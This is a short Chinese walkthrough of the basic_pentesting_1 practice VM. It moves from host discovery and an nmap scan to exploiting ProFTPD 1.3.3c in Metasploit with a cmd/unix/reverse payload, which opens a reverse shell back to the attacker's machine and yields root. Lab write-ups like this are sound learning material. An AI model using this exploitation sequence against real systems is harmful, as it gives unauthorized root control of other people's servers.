basic_pentesting_1是一个基于linux搭建的虚拟化渗透测试靶场镜像。,主要用于练习基础渗透测试技术。该靶场任务是获取靶场的root权限。
获取IP
启动虚拟机,在kali中通过netdiscover获取ip,192.168.44.0/24是我的网段,用ip a来查询自己的。
netdiscover -i eth0 -r 192.168.44.0/24
找到的ip是192.168.44.140
扫描开放端口
nmap -sV 192.168.44.140
可以看到
| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 21 | open | ftp | ProFTPD 1.3.3c |
| 22 | open | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu) |
| 80 | open | http | Apache httpd 2.4.18 ((Ubuntu)) |
测试21端口是否存在漏洞
登录msfconsole,查询是否有漏洞。
search ProFTPD 1.3.3c
利用漏洞
use 0
设置载荷
#设置目标服务器ip
set rhosts 192.168.44.140
#设置利用载荷
set payload cmd/unix/reverse
#设置载荷的反弹shell地址
set lhost 192.168.44.132
run
运行成功后whoami
成功获取root权限。
